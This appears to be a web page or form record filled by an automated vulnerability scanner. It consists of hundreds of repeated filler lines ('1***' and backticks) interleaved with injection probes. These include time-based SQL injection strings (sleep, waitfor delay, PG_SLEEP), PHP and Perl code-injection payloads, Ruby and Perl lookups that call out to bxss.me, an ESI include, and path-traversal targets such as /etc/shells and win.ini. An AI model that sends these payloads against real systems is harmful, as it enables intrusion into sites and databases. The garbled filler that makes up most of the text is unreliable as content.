Mr.
1
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
response.write(9552683*9479567)
-
'+response.write(9552683*9479567)+'
-
"+response.write(9552683*9479567)+"
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
${9999139+9999465}
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.
- `***
-
/etc/shells
-
c:/windows/win.ini
-
bxss.me
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
!(()&&!|||
-
^(#$!@#$)(()))******
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
'.gethostbyname(lc('hitjt'.'qiewrsqn17849.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(101).chr(84).chr(97).chr(90).'
-
".gethostbyname(lc("hitfh"."flfsnhyr30458.bxss.me."))."A".chr(67).chr(hex("58")).chr(100).chr(68).chr(99).chr(71)."
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
-
';print(md5(31337));$a='
-
";print(md5(31337));$a="
-
${@print(md5(31337))}
-
${@print(md5(31337))}\
-
'.print(md5(31337)).'
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
ctime sleep p0 (I30 tp1 Rp2 .
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
bxss.me/t/xss.html?%00
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
"+"A".concat(70-3).concat(22*4).concat(111).concat(79).concat(110).concat(81)+(require"socket" Socket.gethostbyname("hitbt"+"zdfystzy09422.bxss.me.")[3].to_s)+"
-
'+'A'.concat(70-3).concat(22*4).concat(122).concat(83).concat(114).concat(72)+(require'socket' Socket.gethostbyname('hitsj'+'rzorbrtlb12a3.bxss.me.')[3].to_s)+'
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
notes
-
notes�
-
notes/.
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
'"()
-
1***
`
- `***
-
1***
`
- `**'&&sleep(271000)*iptffc&&'
-
1***
`
- `**"&&sleep(271000)*sjbgat&&"
-
1***
`
- `**'||sleep(271000)*khevjk||'
-
1***
`
- `**"||sleep(271000)*nfxfka||"
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
response.write(9386226*9567103)
-
'+response.write(9386226*9567103)+'
-
"+response.write(9386226*9567103)+"
-
${10000022+9999849}
-
1***
`
- `***
-
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
-
/etc/shells
-
c:/windows/win.ini
-
bxss.me
-
!(()&&!|||
-
^(#$!@#$)(()))******
-
'.gethostbyname(lc('hitta'.'cwreknwjf5406.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(108).chr(69).chr(102).chr(79).'
-
".gethostbyname(lc("hitdk"."zgajqixn44470.bxss.me."))."A".chr(67).chr(hex("58")).chr(103).chr(89).chr(105).chr(69)."
-
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
-
';print(md5(31337));$a='
-
";print(md5(31337));$a="
-
${@print(md5(31337))}
-
${@print(md5(31337))}\
-
'.print(md5(31337)).'
-
<esi:include src="http://bxss.me/rpb.png"/>
-
bxss.me/t/xss.html?%00
-
"+"A".concat(70-3).concat(22*4).concat(102).concat(71).concat(110).concat(67)+(require"socket" Socket.gethostbyname("hitrw"+"nrkdckozd3238.bxss.me.")[3].to_s)+"
-
'+'A'.concat(70-3).concat(22*4).concat(114).concat(79).concat(116).concat(90)+(require'socket' Socket.gethostbyname('hituj'+'nncfisvg50921.bxss.me.')[3].to_s)+'
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
-1 OR 2+362-362-1=0+0+0+1 --
-
-1 OR 3+362-362-1=0+0+0+1 --
-
-1 OR 2+142-142-1=0+0+0+1
-
-1 OR 3+142-142-1=0+0+0+1
-
-1' OR 2+649-649-1=0+0+0+1 --
-
-1' OR 3+649-649-1=0+0+0+1 --
-
-1' OR 2+307-307-1=0+0+0+1 or 'cPevtxf7'='
-
-1' OR 3+307-307-1=0+0+0+1 or 'cPevtxf7'='
-
-1" OR 2+998-998-1=0+0+0+1 --
-
-1" OR 3+998-998-1=0+0+0+1 --
-
if(now()=sysdate(),sleep(15),0)
-
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
-
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
-
(select(0)from(select(sleep(15)))v)/'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"/
-
1 waitfor delay '0:0:15' --
-
wLY35Yz8'; waitfor delay '0:0:15' --
-
8Vh7hyvl' OR 689=(SELECT 689 FROM PG_SLEEP(15))--
-
0MjbkLgt') OR 320=(SELECT 320 FROM PG_SLEEP(15))--
-
khPWIDJU')) OR 207=(SELECT 207 FROM PG_SLEEP(15))--
-
1***
`
- `***'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
-
1'"
-
@@vGwoJ
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***
-
1***
`
- `***